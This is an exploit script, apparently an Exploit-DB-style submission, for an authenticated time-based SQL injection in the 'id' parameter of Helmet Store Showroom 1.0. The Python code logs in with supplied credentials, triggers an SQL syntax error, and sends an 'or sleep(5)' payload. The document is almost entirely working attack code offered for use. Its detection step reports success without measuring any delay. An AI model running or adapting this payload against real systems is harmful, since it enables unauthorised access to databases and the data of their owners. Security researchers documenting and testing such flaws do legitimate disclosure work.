# Exploit Title: Helmet Store Showroom  1.0 - authenticated SQL Injection
# Date: 25-11-2022
# Exploit Author: syad
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 + XAMPP 3.2.4
# CVE ID : N/A

# Description

# The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection.


import requests
import sys
import pyfiglet
sess = requests.Session()


proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}

def login1(ip,username,password):
    x  = "http://%s/hss/classes/Login.php?f=login" % ip
    login = {'username':username, 'password':password}
    r = sess.post(x, data=login, proxies=proxies)
    #print(r.content)



def login(ip):
    x = ("http://%s/hss/admin") % ip
    r = sess.get(x,proxies=proxies)
    if "Welcome to Helmet Store Showroom - PHP" in r.text:
        print("--------------------------------------------")
        print("[+] Success Login")
    

def detect_sql(ip):
    x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip
    r = sess.get(x,proxies=proxies)
    if "You have an error in your SQL syntax" in r.text:
        print("[+] Found SQL Error")
    

def time_based_sqli(ip):
    x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip
    r = sess.get(x,proxies=proxies)
    print("[+] Time Based SQL Found")
    print("[*]!!! Time To Report !!!")





    
if __name__ == "__main__":
    result = pyfiglet.figlet_format("PWN")
    print(result)
    try:
        ip = sys.argv[1].strip()
        username = sys.argv[2].strip()
        password = sys.argv[3].strip()
    except IndexError:
        print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])
        print("[-] Example: %s 192.168.1.x"  % sys.argv[0])
        sys.exit(-1)

login1(ip,username,password)
login(ip)
detect_sql(ip)
time_based_sqli(ip)